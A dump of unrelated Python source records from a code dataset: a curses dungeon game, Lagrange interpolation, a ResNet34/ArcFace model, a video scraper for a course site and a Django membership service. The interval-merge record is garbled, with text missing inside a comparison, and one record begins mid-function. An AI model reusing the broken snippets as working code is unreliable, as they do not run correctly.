self.visit(*self.current_position)\n for i in (-1, 1):\n if self.level_value(self.current_position[0] + i,\n self.current_position[1]) == ' ':\n self.see(self.current_position[0] + i,\n self.current_position[1])\n if self.level_value(self.current_position[0],\n self.current_position[1] + i) == ' ':\n self.see(self.current_position[0],\n self.current_position[1] + i)\n if 0 <= self.player.level < len(self.levels):\n for y_index, row in enumerate(self.levels[self.player.level]):\n for x_index, value in enumerate(row):\n if (x_index, y_index) not in self.seen[self.player.level]:\n self.map.addstr(y_index, x_index, '#',\n color(foreground=curses.COLOR_BLUE))\n elif (x_index, y_index) \\\n not in self.visited[self.player.level] \\\n and value in ('M', 'O', 'I'):\n self.map.addstr(y_index, x_index, constants.UNKNOWN,\n 
color(foreground=curses.COLOR_MAGENTA))\n elif value == 'I':\n self.map.addstr(y_index, x_index, constants.ITEM,\n color(foreground=curses.COLOR_CYAN))\n elif value == 'X':\n self.map.addstr(y_index, x_index, constants.SAVEPOINT,\n color(foreground=curses.COLOR_BLUE))\n elif value == '=':\n self.map.addstr(y_index, x_index, constants.LADDER_UP,\n color(foreground=curses.COLOR_GREEN))\n elif value == '%':\n self.map.addstr(y_index, x_index,\n constants.LADDER_DOWN,\n color(foreground=curses.COLOR_GREEN))\n elif value == 'M':\n self.map.addstr(y_index, x_index, constants.MONSTER,\n color(foreground=curses.COLOR_RED))\n elif value == 'O':\n self.map.addstr(y_index, x_index, constants.HOLE)\n else:\n self.map.addstr(y_index, x_index, value)\n\n self.map.addstr(self.current_position[1], self.current_position[0],\n constants.PLAYER,\n color(foreground=curses.COLOR_YELLOW))\n\n self.status_info.addstr(1, 2, \"HP: \")\n self.status_info.addstr(1, 6, 10 * ' ',\n color(foreground=curses.COLOR_RED))\n self.status_info.addstr(1, 6, self.health_bar,\n color(foreground=curses.COLOR_RED))\n\n self.status_info.addstr(1, 17,\n f'{self.player.current_health:3}/'\n f'{self.player.max_health:3}')\n self.status_info.addstr(1, 27, f\"Staerke: {self.player.strength}\")\n\n self.refresh()\n\n def handle(self, key: int, previous=None):\n self._last_position = self.current_position\n\n if self.player.current_health < 1:\n return globals.GAME_OVER\n elif key in (constants.ESCAPE, constants.SPACE):\n return globals.PAUSE\n elif key in (constants.TAB, ord('i')):\n return globals.INVENTORY\n elif key == ord('h'):\n return globals.CONTROLS_MAP\n elif key in (ord('w'), constants.UP):\n self.player.position.y -= 2\n elif key in (ord('s'), constants.DOWN):\n self.player.position.y += 2\n elif key in (ord('a'), constants.LEFT):\n self.player.position.x -= 2\n elif key in (ord('d'), constants.RIGHT):\n self.player.position.x += 2\n elif key == ord('z'):\n return globals.STORY\n\n if self._last_position != self.current_position:\n if self.current_value == 'M':\n self.visit(*self.current_position)\n return globals.MONSTER\n elif self.current_value == 'I':\n return globals.ITEM\n elif self.current_value == 'X':\n return globals.SAVE_GAME\n elif self.current_value == '=':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = True\n return globals.LADDER\n elif self.current_value == '%':\n if self.player.level < len(self.visited):\n self.visit(*self.current_position)\n globals.LADDER.upwards = False\n return globals.LADDER\n elif self.current_value == 'O':\n if 0 <= self.player.level < len(self.visited):\n self.visit(*self.current_position)\n self.log_event('Du bist durch ein Loch gefallen')\n self.player.position.level -= 1\n return self\n\n\nclass LadderDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.upwards = True\n self.question = ''\n self.options = ['[J] Ja', '[N] Nein']\n self.initialized = False\n self.setup()\n\n def print(self):\n if not self.initialized:\n if self.upwards:\n self.question = 'Du hast eine Leiter nach oben gefunden. ' \\\n 'Willst du sie herauf klettern?'\n else:\n self.question = 'Du hast eine Leiter nach unten gefunden. 
' \\\n 'Willst du sie hinab klettern?'\n self.setup()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n if self.upwards:\n globals.MAP.log_event('Du bist eine Leiter hinaufgestiegen')\n globals.MAP.player.position.level += 1\n if globals.MAP.player.level not in globals.MAP.stories_shown:\n globals.MAP.stories_shown.add(globals.MAP.player.level)\n globals.STORY.text = \\\n globals.STORY.stories[str(globals.MAP.player.level)]\n return globals.STORY\n return globals.MAP\n else:\n globals.MAP.log_event('Du bist eine Leiter hinabgestiegen')\n globals.MAP.player.position.level -= 1\n return globals.MAP\n elif key == ord('n'):\n self.initialized = False\n return globals.MAP\n previous.print()\n return self\n\n\nclass SaveGameDialog(Dialog):\n \"\"\"\n Dialog when accessing a save point\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.question = \"Du kannst deinen Spielstand speichern. \" \\\n \"Dein vorheriger Spielstand wird ueberschrieben. \" \\\n \"Bist du dir sicher?\"\n self.options = [\"[J] Ja\", \"[N] Nein\"]\n self.setup()\n\n def handle(self, key: int, previous=None):\n if key == ord('n'):\n globals.MAP.log_event('Du hast das Spiel nicht gespeichert')\n return globals.MAP\n elif key in (ord('j'), constants.ENTER):\n globals.MAP.save_game()\n globals.MAP.log_event('Du hast das Spiel gespeichert')\n return globals.MAP\n globals.MAP.print()\n return self\n\n\nclass MonsterDialog(Dialog):\n \"\"\"\n Dialog when encountering a monster\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.options = [\"[ENTER] OK\"]\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous=None):\n if key == constants.ENTER:\n self.initialized = False\n return globals.MAP\n globals.MAP.print()\n return self\n\n def initialize(self):\n player = globals.MAP.player\n monster = globals.MAP.monsters[(player.level,\n *globals.MAP.current_position)]\n\n self.question = f'Du kaempfst gegen das Monster:\\n{monster}\\n' \\\n f'Staerke: {monster.strength}'\n\n if player.strength >= monster.strength:\n self.question += '\\nUnd du besiegst es!'\n globals.MAP.log_event(f'{monster.name.title()} wurde besiegt!')\n globals.MAP.current_value = ' '\n globals.MAP.levels[player.level][globals.MAP._last_position[1]][\n globals.MAP._last_position[0]] = 'I'\n globals.MAP.items[(player.level, *globals.MAP._last_position)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(player.level + 1)\n else:\n damage = int(player.strength / monster.strength * player.strength)\n self.question += '\\nUnd das Monster besiegt dich...'\n self.question += f'\\nDu hast {damage} Schaden ausgeteilt'\n globals.MAP.log_event(f'{monster.name.title()} '\n f'hat dich besiegt...')\n globals.MAP.player.damage += monster.strength - player.strength\n globals.MAP.monsters[(player.level, player.x,\n player.y)].strength -= damage\n\n globals.MAP.player.position._x, globals.MAP.player.position._y = \\\n globals.MAP.starting_positions[player.level]\n self.setup()\n\n\nclass ItemDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.item = None\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n 
super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n globals.MAP.player.add_item(self.item)\n globals.MAP.current_value = ' '\n globals.MAP.log_event(f'Du hast {self.item} aufgenommen')\n return previous\n if key == ord('n'):\n self.initialized = False\n globals.MAP.log_event(f'Du hast {self.item} liegen lassen')\n return previous\n previous.print()\n return self\n\n def initialize(self):\n self.item = globals.MAP.items[(globals.MAP.player.level,\n *globals.MAP.current_position)]\n\n self.question = 'Du hast einen Gegenstand gefunden!\\n' \\\n f'Name: {self.item}\\n' \\\n f'Staerke: {self.item.factor}'\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n other_item = None\n if self.item.type == 'Kopf':\n other_item = globals.MAP.player.head\n elif self.item.type == 'Brust':\n other_item = globals.MAP.player.chest\n elif self.item.type == 'Beine':\n other_item = globals.MAP.player.legs\n elif self.item.type == 'Fuesse':\n other_item = globals.MAP.player.feet\n elif self.item.type == 'Waffe':\n other_item = globals.MAP.player.weapon\n elif self.item.type == 'Keks' and len(globals.MAP.player.cookies) > 2:\n other_item = globals.MAP.player.cookies[0]\n if other_item:\n self.question += f'\\nDu hast bereits diesen Gegenstand:\\n' \\\n f'Name: {other_item}\\n' \\\n f'Staerke: {other_item.factor}'\n self.options[0] = '[J] Austauschen'\n self.setup()\n\n\nclass GameOverDialog(Dialog):\n def __init__(self):\n super().__init__()\n self.question = 'Du bist gestorben\\nGame Over'\n self.options = ['[O] OK']\n self.setup()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key == ord('o'):\n globals.MAP = GameMap()\n return globals.MAIN\n previous.print()\n return self\n","sub_path":"src/game_map.py","file_name":"game_map.py","file_ext":"py","file_size_in_byte":24793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
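The loader in the record above re-parses map positions that were serialized as stringified tuples. A minimal round-trip sketch of that convention, assuming the saver wrote keys with str(tuple) (the matching save_game is not shown in this excerpt):

position = (0, 4, 7)  # (level, x, y)
key = str(position)  # becomes "(0, 4, 7)" in the JSON save file
decoded = tuple(int(i) for i in key[1:-1].split(', '))
assert decoded == position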
+{"seq_id":"73003329","text":"from functools import reduce\n\nfrom modules import utils\n\n\ndef lambda_eval(i, lst, p, flag=False):\n \"\"\" Lagrange interpolation\n return lambda(0)\n \"\"\"\n num = []\n den = []\n for element in lst:\n if element != i:\n num.append(element)\n den.append(element - i)\n\n eval_num = reduce(lambda x, y: x * y, num)\n eval_den = reduce(lambda x, y: x * y, den)\n\n if not flag:\n if eval_den < 0:\n eval_den = p - abs(eval_den)\n\n return (eval_num * utils.mult_inv(eval_den, p)) % p\n\n return eval_num * p // eval_den # p is delta\n\n\ndef reconstruct_secret(dict, p):\n sum = 0\n for node, share in dict.items():\n sum += lambda_eval(node, dict.keys(), p) * share\n\n return sum % p\n","sub_path":"modules/lagr_interpolate.py","file_name":"lagr_interpolate.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"477949135","text":"\n# 方法一:通过滑动窗口的方法实现\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n if not s:\n return 0\n \n left = 0\n # set() 函数创建一个无序不重复元素集,可进行关系测试,删除重复数据,还可以计算交集、差集、并集等。\n lookup = set() \n n = len(s)\n max_len = 0\n cur_len = 0\n for i in range(n):\n cur_len += 1\n while s[i] in lookup:\n lookup.remove(s[left])\n left += 1\n cur_len -= 1\n if cur_len > max_len:\n max_len = cur_len\n lookup.add(s[i])\n return max_len\n\n\n# 方法二:通过哈希表的方法实现\n# class Solution(object):\n# def lengthOfLongestSubstring(self, s):\n# \"\"\"\n# :type s: str\n# :rtype: int\n# \"\"\"\n# dic = {}\n# l, res = 0, 0\n# for r in range(len(s)):\n# if s[r] in dic:\n# l = max(dic[s[r]], l)\n# dic[s[r]] = r + 1\n# res = max(res, r - l + 1)\n# return res\n\n\nif __name__ == '__main__':\n sovle = Solution()\n print(sovle.lengthOfLongestSubstring('abcabcbb'))\n ","sub_path":"1-20/003-无重复字符的最长子串/3_lengthOfLongestSubstring.py","file_name":"3_lengthOfLongestSubstring.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"293659342","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 20 20:28:41 2018\n\n@author: junyang\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom net_ArcFace import ArcFace\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.bn0 = nn.BatchNorm2d(inplanes,eps=1e-03) \n self.conv1 = conv3x3(inplanes, planes, 1)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.relu = nn.PReLU()\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n out =self.bn0(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n #out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4,eps=1e-03)\n self.relu = nn.PReLU()\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64,eps=1e-03)\n self.relu = nn.PReLU()\n #self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], stride=2)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.bn2 = nn.BatchNorm2d(512,eps=1e-03)\n self.dropout = nn.Dropout2d(p=0.4, inplace=True)\n self.fc1 = nn.Linear(512 * 7 * 7, 512)\n self.bn3 = nn.BatchNorm1d(512,eps=1e-03)\n self.fc2 = ArcFace(512,num_classes)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion,eps=1e-03),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n 
def forward(self, x, label):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.layer1(x)\n #print('layer1: ',x.size())\n x = self.layer2(x)\n #print('layer2: ',x.size())\n x = self.layer3(x)\n #print('layer3: ',x.size())\n x = self.layer4(x)\n #print('layer4: ',x.size())\n\n x = self.bn2(x)\n x = self.dropout(x)\n #print('dropout: ',x.size())\n x = x.view(x.size(0),-1)\n x = self.fc1(x)\n #print('fc1: ',x.size())\n x = self.bn3(x)\n x = self.fc2(x,label)\n #print('fc2: ',x.size())\n\n return x\n\n\n\n\ndef resnet34(**kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n return model\n\n\"\"\"\na = resnet34()\nprint(a)\nfrom torch.autograd import Variable\nx = Variable(torch.randn(20,3,224,224))\nout = a(x)\n\"\"\"\n","sub_path":"Resnet34_test_cfp/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
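A shape-check sketch for the model above. num_classes=10 and the batch size are arbitrary, and it assumes net_ArcFace's ArcFace maps (features, label) to per-class logits; eval() sidesteps BatchNorm's batch-size requirements:

import torch

model = resnet34(num_classes=10)
model.eval()
x = torch.randn(2, 3, 224, 224)  # 224 -> 112 -> 56 -> 28 -> 14 -> 7, matching fc1's 512*7*7 input
label = torch.randint(0, 10, (2,))
with torch.no_grad():
    logits = model(x, label)
print(logits.shape)  # expected: torch.Size([2, 10])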
+{"seq_id":"349413969","text":"def sort(List):\n k=len(List)-1\n insert=k\n for i in range(len(List)-2):\n if List[i][0]List[k][0]:\n insert=i+1\n lis=List[k]\n for i in range(insert+1,len(List)):\n List[len(List)+insert-i]=List[len(List)+insert-i-1]\n List[insert]=lis\n return List\n\ndef Func(List):\n for i in range(len(List)):\n for j in range(i+1,len(List)):\n if List[i][0]<=List[j][0] and List[j][1]<=List[i][1]:\n List.remove(List[j])\n return Func(List)\n if List[j][0]<=List[i][0] and List[j][1]>=List[i][1]:\n List.remove(List[i])\n return Func(List)\n if List[i][0]<=List[j][1] and List[i][1]>=List[j][0]:\n if List[i][0] 4 or len(problem[2]) > 4:\n raise BaseException\n except:\n return \"Error: Numbers cannot be more than four digits.\"\n\n #Check if operator is valid\n try:\n if problem[1] != '+' and problem[1] != '-':\n raise BaseException\n except:\n return \"Error: Operator must be '+' or '-'.\"\n\n #Return True if data is validated\n return True\n\ndef arithmetic_arranger(problems, showAnswer=False):\n arranged_problems = 0\n line1=line2=line3=line4 = \"\"\n problem_gap = \" \" * 4 \n #Check Problem Count\n try:\n if len(problems) > 5:\n raise BaseException\n except:\n return \"Error: Too many problems.\"\n\n #Handle each problem\n for problem in problems:\n part = problem.split()\n #Validate problems\n valid = validate_data(part)\n if valid != True:\n return valid\n\n #Arrange Problems \n space = max(len(part[0]),len(part[2])) + 2\n if len(line1) > 0:\n line1 += problem_gap\n line2 += problem_gap\n line3 += problem_gap\n\n line1 += part[0].rjust(space)\n line2 += part[1] + part[2].rjust(space-1)\n line3 += '-' * (space)\n\n #If showAnswer is true\n if showAnswer:\n #Perform math\n if part[1] == '+':\n solution = int(part[0]) + int(part[2])\n else:\n solution = int(part[0]) - int(part[2])\n \n if len(line4) > 0:\n line4 += problem_gap\n line4 += str(solution).rjust(space)\n\n #Return Arranged Problems\n arranged_problems = f\"{line1}\\n{line2}\\n{line3}\"\n if showAnswer:\n arranged_problems += f\"\\n{line4}\"\n return arranged_problems","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"536997664","text":"# class Linyu(object):\n#\n# hobby = 'mmp'\n#\n# def __init__(self, name, age, weight):\n# self.name = name\n# self._age = age\n# self.__weight = weight\n#\n#\n# @classmethod#调用的时候用类名 , 而不是某个对象\n# def get_hobby(cls):\n# return cls.hobby\n#\n#\n# @property #像访问属性一样 调用方法\n# def get_weight(self):\n# return self.__weight\n#\n#\n# def self_intro(self):\n# print('My name is %s \\n I am %s years old \\n' % (self.name, self._age))\n#\n#\n#\n#\n# if __name__ == '__main__':\n# linyu = Linyu('石世伟', '20', '65')\n# print(dir(linyu))\n# print(linyu.get_hobby())\n# print(linyu.get_weight)\n# linyu.self_intro()\n# encoding:utf-8\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import Pool\n\n\nclass MaiZi():\n def __init__(self):\n self.url = 'http://www.maiziedu.com/course/957/ '\n\n # 解析url的函数\n def parse_next_url(self):\n request = requests.get(self.url)\n request.encoding = request.apparent_encoding\n for url in BeautifulSoup(request.text, 'lxml').select('ul.lesson-lists li a'):\n next_url = 'http://www.maiziedu.com/ ' + url['href']\n yield next_url\n\n # 解析内容的url\n def parse_content(self, url):\n request = requests.get(url)\n request.encoding = request.apparent_encoding\n demo = '\\$lessonUrl = \"(.*?)\"'\n de = re.compile(demo, re.S)\n url_next = de.findall(request.text)[0]\n content = requests.get(url_next).content\n title = BeautifulSoup(request.text, 'lxml').select('span.selected')[0]['name']\n print(title)\n with open('D:\\\\' + title + '.mp4', 'wb') as e:\n e.write(content)\n\n # 线程\n def parse_pool(self):\n pool = Pool(2)\n pool.map(self.parse_content, self.parse_next_url())\n\n\nif __name__ == '__main__':\n Run = MaiZi()\n Run.parse_pool()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"494540410","text":"import collections\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\nfrom django.db.models import Prefetch\n\nfrom upday.models import StudentAssociatorShip, Associator, AssociatorOrder, UserCard, AssociatorEntry, Project, Coupon, \\\n StudentCouponShip, PunchRecord\nfrom upday.modules.channel.service.project_channel_service import ProjectChannelService\nfrom upday.modules.common.service.cache_service import key_handler\nfrom upday.modules.common.service.datetime_service import DatetimeService\nfrom upday.modules.common.service.encrypt_service import EncryptService\nfrom upday.modules.common.service.file_service import FileService\nfrom upday.modules.common.service.url_service import UrlService\nfrom upday.modules.tasker.rule import scheduler\nfrom upday.modules.wechat.service.message_service import MessageService\nfrom upday.modules.wechat.service.order_service import OrderService\nfrom upday.modules.channel.service.channel_service import ChannelService\n\n\nclass AssociatorService:\n\n def create(self, team):\n associator = Associator(\n team=team\n )\n associator.save()\n return associator\n\n def bind(self, student, associator):\n try:\n ship = StudentAssociatorShip.objects.get(student=student, associator=associator)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n ship = StudentAssociatorShip(student=student, associator=associator)\n ship.save()\n ship.exit_time = ship.join_time + timedelta(days=365)\n ship.save()\n return True\n # 学生是否曾参加会员但已过期失效\n if AssociatorService().is_expired_ship(ship):\n now = DatetimeService.now()\n ship.join_time = now\n ship.exit_time = now + timedelta(days=365)\n ship.save()\n return True\n ship_id = StudentAssociatorShip.objects.filter(student=student, associator=associator)[0].id\n ship_id = EncryptService().encrypt_id('HASH_KEY_STUDENT_ASSOCIATOR_ID', ship_id)\n msg = 'The StudentAssociatorShip is existed, id: ' + str(ship_id)\n raise Exception(msg)\n\n def get_student_usercard_set(self, student):\n # 取出该学生已参加的所有会员项目,预加载出项目、punchrecord_list(按两种不同的条件取出,并起了别名all_punchrecord_list和finished_punchrecord_list,set变成了list)\n my_project_list = []\n usercard_set = student.usercard_set.filter(status=1).select_related('project').prefetch_related(\n Prefetch('punchrecord_set', to_attr='all_punchrecord_list'),\n Prefetch('punchrecord_set', queryset=PunchRecord.objects.exclude(status=0), to_attr='finished_punchrecord_list'))\n for usercard in usercard_set:\n my_project_list.append(usercard.project)\n return my_project_list, usercard_set\n\n def get_final_url_from_entry(self, is_associator, entry, my_project_list, usercard_set):\n # 若学生没参加会员,url传空字符串\n if is_associator == 0:\n url = ''\n has_joined = 0\n return url, has_joined\n # 若学生参加了会员,无论是否过期,都返回条目详情。\n # 若条目绑定了project,传project的url;若无,传link;若都无,传空字符串。\n current_project = entry.project\n if current_project:\n url = ChannelService.get_common_channel_link('', EncryptService().encrypt_id('HASH_KEY_PROJECT_ID',\n current_project.id))\n if current_project in my_project_list:\n has_joined = 1\n user_card = usercard_set.get(project=entry.project)\n punch_day = len(user_card.all_punchrecord_list)\n real_punch_day = len(user_card.finished_punchrecord_list)\n if punch_day == real_punch_day:\n has_joined = 2\n else:\n has_joined = 0\n return url, has_joined\n entry_link = entry.link\n if 
entry_link != '':\n url = entry_link\n has_joined = 0\n return url, has_joined\n return '', 0\n\n def get_associator_entry_list(self, associator_album, is_associator, my_project_list, usercard_set):\n associator_entry_list = []\n # 取出会员专辑内所有项目\n for associator_entry in associator_album.associatorentry_set.select_related('project').order_by('position'):\n picture = FileService().sign_url(associator_entry.picture)\n url, has_joined = self.get_final_url_from_entry(\n is_associator=is_associator,\n entry=associator_entry,\n my_project_list=my_project_list,\n usercard_set=usercard_set,\n )\n dict = {\n 'url': url,\n 'has_joined': has_joined,\n 'name': associator_entry.name,\n 'price': associator_entry.price,\n 'picture': picture,\n 'introduce': associator_entry.introduce,\n }\n associator_entry_list.append(dict)\n return associator_entry_list\n\n # 根据name查询会员是否存在\n def is_existed(self, name):\n return Associator.objects.filter(name=name).count() > 0\n\n def send_bind_associator_message(self, name, time_end, associator_id, openid):\n # 延时发消息\n scheduler.event_bound_associator(openid, associator_id)\n encrypt_handler = EncryptService()\n associator_id = encrypt_handler.encrypt_id('HASH_KEY_ASSOCIATOR_ID', associator_id)\n url = ChannelService().get_associator_link(associator_id)\n message_handler = MessageService()\n # 获取模板信息\n template_data, template_id = message_handler.get_bind_associator_template(name, time_end)\n # 发送模板消息\n message_handler.send_template(user_id=openid, template_id=template_id,\n data=template_data, url=url)\n\n # 更新会员信息\n def update_associator(self, validated_data):\n associator = validated_data['associator']\n associator.name = validated_data['name']\n associator.present_price = validated_data['present_price']\n associator.origin_price = validated_data['origin_price']\n if validated_data['picture']:\n associator.picture = validated_data['picture']\n if validated_data['voice']:\n associator.voice = validated_data['voice']\n if validated_data['qrcode']:\n associator.qrcode = validated_data['qrcode']\n if validated_data['benefit']:\n associator.benefit = validated_data['benefit']\n if validated_data['introduction']:\n associator.introduction = validated_data['introduction']\n if validated_data['training']:\n associator.training = validated_data['training']\n associator.save()\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n return associator\n\n # 查询某种特定会员ID的学生数量\n def count_join_num(self, associator):\n return StudentAssociatorShip.objects.filter(associator=associator).count()\n\n # 删除会员(注意:已经有人报名的会员不能通过此接口删除)\n def delete_associator(self, associator):\n if associator.students.count() >= 1:\n msg = 'Warning! 
There are some students join this associator, you can not delete it'\n raise Exception(msg)\n else:\n associator.delete()\n\n # 查询团队中的会员列表\n def find_all_associator(self, team):\n associator_set = Associator.objects.filter(team=team).order_by('-create_time')\n return associator_set\n\n def get_associator(self, validated_data):\n instance = Associator.objects.get(id=validated_data['associator_id'])\n return instance\n\n def is_order_exists(self, out_trade_no, openid, total_fee, trade_type):\n try:\n order = AssociatorOrder.objects.get(out_trade_no=out_trade_no, pay_status=0)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n return False\n return order\n # if order.student.openid == openid and int(order.total_fee * 100) == int(\n # total_fee) and order.trade_type == trade_type:\n # return order\n # else:\n # return False\n\n def get_associator_list(self, student):\n \"\"\"\n 为什么先算学生的会员,自己慢慢体会\n :param student:\n :return:\n \"\"\"\n return student.associator_set.prefetch_related('associatoralbum_set__associatorentry_set')\n\n def complete_order(self, order, transaction_id, time_end, is_subscribe, bank_type, settlement_total_fee, fee_type):\n order.transaction_id = transaction_id\n order.time_end = time_end\n order.is_subscribe = is_subscribe\n order.bank_type = bank_type\n order.settlement_total_fee = settlement_total_fee\n order.fee_type = fee_type\n order.pay_status = 1\n order.save()\n return True\n\n # 解绑通过会员免费报名的项目\n def unbind_project(self, project_list, student, time_end):\n \"\"\"\n :param upday_id: 所有的orion_upday_item_id\n :param uid:\n :param time_end: AssociatorOrder表里的time_end(支付完成时间)时间戳,为防止将购买会员之前就已经购买的项目也\\\n 删除掉,通过时间筛选掉这部分,只将参加会员后的会员项目解绑。\n :return:\n \"\"\"\n for project in project_list:\n target_card = UserCard.objects.filter(project=project, create_at__gt=time_end, student=student)\n target_card.update(status=0)\n pass\n\n def clear_associator_detail_cache(self, associator):\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n\n def is_expired_ship(self, ship):\n # 会员的失效时间\n # expire_time_stamp = DatetimeService.get_timestamp_from_utc_datetime(expire_time)\n # 会员是否已过期失效\n # now_stamp = DatetimeService.get_current_timestamp()\n if ship.exit_time < DatetimeService.now():\n return True\n else:\n return False\n\n def is_associator_expired(self, associator, student):\n try:\n student_associator_ship = StudentAssociatorShip.objects.get(associator=associator, student=student)\n except ObjectDoesNotExist:\n msg = {'result': 'No such a student_associator_ship'}\n raise Exception(msg, code='validation')\n except MultipleObjectsReturned:\n msg = {'result': 'Multiple student_associator_ship'}\n raise Exception(msg, code='validation')\n return self.is_expired_ship(student_associator_ship)\n\n def get_joined_associator_list(self, student_associator_ship_set):\n associator_list = []\n for ship in student_associator_ship_set:\n dict = {\n 'associator_id': EncryptService().encrypt_id('HASH_KEY_ASSOCIATOR_ID', ship.associator.id),\n 'name': ship.associator.name\n }\n associator_list.append(dict)\n return associator_list\n\n #################################################################################\n # 以下为生成商户订单功能\n #################################################################################\n\n # 商户订单的out_trade_no\n def create_out_trade_no(self):\n order_service_handler = OrderService()\n return 
